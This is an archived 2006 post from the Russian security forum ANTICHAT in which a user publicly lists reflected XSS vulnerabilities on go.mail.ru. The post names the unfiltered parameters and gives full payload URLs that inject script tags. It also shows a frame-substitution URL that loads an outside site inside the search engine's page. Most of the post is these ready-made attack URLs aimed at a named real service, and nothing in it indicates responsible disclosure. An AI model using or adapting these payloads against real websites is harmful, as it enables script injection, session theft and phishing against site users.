Баги на сайтах.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

25.05.2006, 20:31

Go0o$E

Members of Antichat - Level 5

Регистрация: 27.01.2006

Сообщений: 258

Провел на форуме:
6127131

Репутация: 774

XSS на go.mail.ru
Не фильтруется: surl..

Код:

http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%2Burl%253D%2522www%2Edogcatalog%2Enet%252F%2A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%25E7%25E4%25E0%25ED%25E8%25E5&surl=<script>alert('XSS')%3B</script>

Не фильтруется: id, iid, pageurl.

Код:

http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl="><script>alert('XSS')%3B</script>&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b

Не фильтруется: id, imgurl, iid, pageurl.

Код:

http://go.mail.ru/details.html?imgurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252Ffonoteka%252Fispol%252F576227168_tonnel%2Egif&id="><script>alert('XSS')%3B</script>&iid=2&pageurl=http%253A%252F%252Fwww%2Etonnel%2Eru%252F%253Fl%253Dfonoteka%2526main%253D33&imgheight=421&imgwidth=300&ref=1&links=1&imgsize=9025

Подмена фрейма.

Код:

http://go.mail.ru/frame.html?imgurl=http%3A%2F%2Fphoto-report%2Enight%2Eru%2Fimg%2Fnight-345%2Ejpg&pageurl=http://www.antichat.ru/&id=7908229&iid=3&imgwidth=300&imgheight=188&imgsize=21562&images_links=b

__________________